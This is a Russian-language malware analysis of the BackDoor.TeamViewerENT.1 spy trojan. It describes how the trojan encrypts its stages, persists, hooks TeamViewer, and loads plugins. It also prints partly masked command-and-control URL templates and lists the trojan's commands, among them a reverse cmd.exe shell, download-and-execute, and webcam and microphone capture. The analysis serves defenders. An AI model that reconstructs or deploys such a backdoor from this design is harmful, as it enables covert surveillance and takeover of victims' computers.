BackDoor.TeamViewerENT.1 - бэкдор-шпион, использующий утилиту TeamViewer


BackDoor.TeamViewerENT.1 (самоназвание Spy-Agent - называется административный интерфейс его системы управления) - троян-бэкдор для Microsoft Windows, использующий для шпионажа компоненты программы удаленного администрирования TeamViewer.

BackDoor.TeamViewerENT.1 Zarajaet PK po vsemu miru

Бэкдор BackDoor.TeamViewerENT.1 состоит из трех зашифрованных блоков исполняемого кода, которые расшифровываются последовательно. Первый блок зашифрован с использованием BASE64 и XOR, остальные - BASE64 + RC4.

Основное отличие данного вредоноса от своих предшественников в том, что BackDoor.TeamViewerENT.1 использует компоненты популярной программы удаленного администрирования компьютера TeamViewer целенаправленно для шпионажа, а не для того, чтобы загрузить в память атакуемой машины вредоносную библиотеку.

Основные вредоносные функции трояна сосредоточены в библиотеке avicap32.dll. После своего запуска троян отключает показ ошибок для приложения TeamViewer. После чтения конфигурации зашифровывает ее локальным ключом и сохраняет в прежнее место. Затем он устанавливает перехваты вызовов функций в адресном пространстве TeamViewer, устанавливает атрибуты "скрытый", "системный" и "только для чтения" всем файлам в собственной папке.

Чтобы обеспечить свою автоматическую загрузку троян модифицирует соответствующие ветви системного реестра Windows, выбирая при этом ветви реестра HKCU или HKLM в зависимости от наличия или отсутствия административных прав.

На следующем шаге троян удаляет файл tvicap32.dll. Запускает отдельный поток, который "убивает" процессы TeamViewer, если на инфицированной машине будет запущен процесс TASKMGR.EXE или PROCEXP.EXE.

Вредоносная программа может использовать дополнительные модули-плагины, которые хранятся в файлах с расширением .pg в той же папке, где расположен троян. Для их запуска бэкдор обходит собственную папку в поиске .pg-файлов, и при их обнаружении запускает несколько потоков (по количеству найденных файлов), которые расшифровывают эти файлы с использованием алгоритма RC4 и загружают их в память.

Для передачи сообщения о собственном состоянии троян определяет положение курсора и по истечении указанного в конфигурации количества секунд отправляет на управляющий сервер следующий запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&sidl=<cur_time>


Где адрес - взят из конфигурации, <TV_ID> - ID TeamViewer, <botId> - уникальный идентификатор зараженного компьютера, <cur_time> - текущее время в формате "YYYY-MM-DD hh:mm:ss".

Дальнейшие запросы отправляются только в случае смены позиции курсора или если на компьютере нажата одна из следующих клавиш:

  • VK_RETURN;
  • VK_SPACE;
  • VK_SHIFT.


В этом случае выполняется запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&eidl=<cur_time>?cidl=<uptime>


Где адрес - взят из конфигурации, <TV_ID> - ID TeamViewer, <botId> - уникальный идентификатор зараженного компьютера, <cur_time> - текущее время в формате "YYYY-MM-DD hh:mm:ss", - время работы бэкдора в режиме простоя в секундах (с момента отправки последнего запроса серверу).

Для получения заданий от управляющего сервера троян ожидает заданное в параметрах конфигурации количество секунд, после чего отсылает на управляющий сервер следующий запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cidl=<uptime>


Где адрес взят из конфигурации, <TV_ID> - ID TeamViewer, <botId> - уникальный идентификатор зараженного компьютера, <uptime> - время работы бэкдора в режиме простоя в секундах (с момента отправки последнего запроса серверу).

В полученном с управляющего сервера ответе троян ищет знак "!" - это маркер начала команды. Затем он разбивает строку на массив строк с разделителями ';', '\r'. Первая строка в полученном массиве является командой.

После выполнения команд на сервер отправляется следующий запрос:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cmd=&device=2


Троян может выполнять следующие команды:

shutdown -- Перезагрузить ПК
poweroff -- Выключить ПК
delproc -- Удалить TeamViewer
restart -- Перезапустить TeamViewer
startaudio -- Начать прослушивание звука с микрофона
stopaudio -- Завершить прослушивание звука с микрофона
startvideo -- Начать просмотр через веб-камеру
stopvideo -- Завершить просмотр через веб-камеру
lexec -- Скачать файл во временную папку (%TEMP%) и запустить его
updef -- Обновить конфигурационный файл или файл трояна
vid -- Определить наличие веб-камеры
cmd -- Подключиться по указанному адресу, после чего запустить cmd.exe с перенаправлением ввода-вывода на удаленный хост
delpg -- Удалить плагин с диска
uppg -- Скачать/обновить плагин
upcfgpg -- Заменить конфигурационный файл плагина на указанный в команде
oftvdel -- Переименовать avicap32.dll в tvicap32.dll
noexit -- Установить значение параметра в единицу
cfgaudio -- Установить значение для соответствующего параметра в конфигурации
cfgvideo
cfgnomedia
cfghostfile
cfgwin7kill
cfgxpkill
cfgpgkey
fakedel
cfgpassteam
cfg
cfgnoexit
Cfggenid


Эти команды открывают перед злоумышленниками широкие возможности для шпионажа за пользователями инфицированных компьютеров, включая похищение конфиденциальной информации. На сегодняшний день установлено, что с помощью этого трояна киберпреступники устанавливали на инфицированные компьютеры вредоносные программы семейств Trojan.Keylogger и Trojan.PWS.Stealer. Также удалось выяснить, что злоумышленники в разное время атакуют в основном жителей ряда определенных стран и регионов.

Зараженные компьютеры расположенные на территории Великобритании и Испании

BackDoor.TeamViewerENT.1 Zarajaet PK v Velikobritanii i Ispanii


Зараженные компьютеры расположенные на территории США

BackDoor.TeamViewerENT.1 Zarajaet PK v USA


Зараженные компьютеры расположенные на территории России

BackDoor.TeamViewerENT.1 Zarajaet PK v Russia